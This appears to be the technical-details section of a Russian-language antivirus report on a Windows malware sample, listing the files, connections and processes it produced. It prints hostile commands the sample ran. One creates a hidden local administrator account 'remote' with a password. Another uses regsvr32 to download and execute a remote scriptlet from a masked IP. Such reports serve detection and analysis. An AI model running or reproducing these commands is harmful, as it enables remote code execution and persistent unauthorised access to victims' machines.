Техническая информация
- <SYSTEM32>\sysfxui.dll
- <Текущая директория>\run.sct
- <Текущая директория>\aaaaaaaaaaaaaaaaaaaaaaa
- <Текущая директория>\output.tlb
- <Текущая директория>\sysfxui.dll
- <Текущая директория>\sysfxui.dll.bak
- %TEMP%\workspace\mountpoint\bit564a.tmp
- %TEMP%\workspace\mountpoint\bit564a.tmp
- <Текущая директория>\aaaaaaaaaaaaaaaaaaaaaaa
- <Текущая директория>\output.tlb
- <Текущая директория>\run.sct
- <Текущая директория>\sysfxui.dll.bak
- %TEMP%\workspace\mountpoint\bit564a.tmp в %TEMP%\workspace\mountpoint\test.txt
- '10#.#32.122.215':80
- 'localhost':445
- 'localhost':49173
- '<SYSTEM32>\bitsadmin.exe' /reset /allusers' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' net user remote Sputnikz5! /add & net localgroup Administradores remote /add' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /reset /allusers
- '<SYSTEM32>\cmd.exe' net user remote Sputnikz5! /add & net localgroup Administradores remote /add
- '<SYSTEM32>\cmd.exe' /c regsvr32 /s /i:http://10#.#32.122.215/launcher11.sct scrobj.dll
- '<SYSTEM32>\regsvr32.exe' /s /i:http://10#.#32.122.215/launcher11.sct scrobj.dll